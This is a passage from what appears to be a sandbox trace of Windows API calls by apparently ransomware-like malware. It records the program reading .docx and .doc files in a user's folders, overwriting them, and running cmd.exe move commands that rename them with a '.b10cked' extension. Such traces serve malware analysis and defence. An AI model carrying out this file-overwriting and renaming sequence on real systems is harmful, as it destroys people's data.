lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0135.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="M9MmOpgceUJDVTGEEh.docx", cchWideChar=23, lpMultiByteStr=0x1328834, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="M9MmOpgceUJDVTGEEh.docx", lpUsedDefaultChar=0x0) returned 23 [0135.122] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xcef0 [0135.122] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0135.122] CloseHandle 
(hObject=0x114) returned 1 [0135.123] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\M9MmOpgceUJDVTGEEh.docx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC") returned 0x26 [0135.124] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0135.124] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xc38, dwThreadId=0xbec)) returned 1 [0135.131] CloseHandle (hObject=0x110) returned 1 [0135.131] CloseHandle (hObject=0x114) returned 1 [0135.131] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.131] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.131] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) 
returned 2 [0135.131] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.131] ReleaseMutex (hMutex=0xf8) returned 1 [0135.131] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.131] ReleaseMutex (hMutex=0xf8) returned 1 [0135.131] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.131] ReleaseMutex (hMutex=0xf8) returned 1 [0135.131] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.131] ReleaseMutex (hMutex=0xf8) returned 1 [0135.131] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\qXDEHmzN LrwSQhutJ.docx" (normalized: "c:\\users\\eebsym5\\documents\\qxdehmzn lrwsqhutj.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0135.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.131] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19192063419) returned 1 [0135.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x102e0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.132] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.133] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.133] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.133] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.133] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x102e0 [0135.133] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.133] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xfdf8 [0135.133] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x102e0 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x102e0 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0135.134] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0135.134] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x816f, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x816f, lpOverlapped=0x0) returned 1 [0135.135] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0135.135] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x816f, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x816f, lpOverlapped=0x0) returned 1 [0135.135] SetFilePointer (in: hFile=0x114, lDistanceToMove=-33135, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8171 [0135.135] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x816f, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x816f, lpOverlapped=0x0) returned 1 [0135.135] SetFilePointer (in: hFile=0x114, lDistanceToMove=-33135, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8171 [0135.135] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x816f, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x816f, lpOverlapped=0x0) returned 1 [0135.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qXDEHmzN LrwSQhutJ.docx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0135.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qXDEHmzN LrwSQhutJ.docx", cchWideChar=23, lpMultiByteStr=0x1328834, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | 
out: lpMultiByteStr="qXDEHmzN LrwSQhutJ.docx", lpUsedDefaultChar=0x0) returned 23 [0135.139] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x102e0 [0135.139] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0135.139] CloseHandle (hObject=0x114) returned 1 [0135.140] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\qXDEHmzN LrwSQhutJ.docx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC") returned 0x26 [0135.141] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0135.141] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xbe8, dwThreadId=0xc04)) returned 1 [0135.150] CloseHandle (hObject=0x110) returned 1 [0135.150] 
CloseHandle (hObject=0x114) returned 1 [0135.150] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.150] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.150] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0135.150] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.150] ReleaseMutex (hMutex=0xf8) returned 1 [0135.150] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.150] ReleaseMutex (hMutex=0xf8) returned 1 [0135.150] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.150] ReleaseMutex (hMutex=0xf8) returned 1 [0135.150] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0135.150] ReleaseMutex (hMutex=0xf8) returned 1 [0135.150] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\92pj.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0135.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.150] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: 
lpPerformanceCount=0x12ed38*=19193963222) returned 1 [0135.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x14de4 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.151] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.152] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.152] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14de4 [0135.152] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0135.152] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x148fc [0135.231] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0135.232] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x14de4 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x14de4 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0135.233] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa6f1, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa6f1, lpOverlapped=0x0) returned 1 [0135.233] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 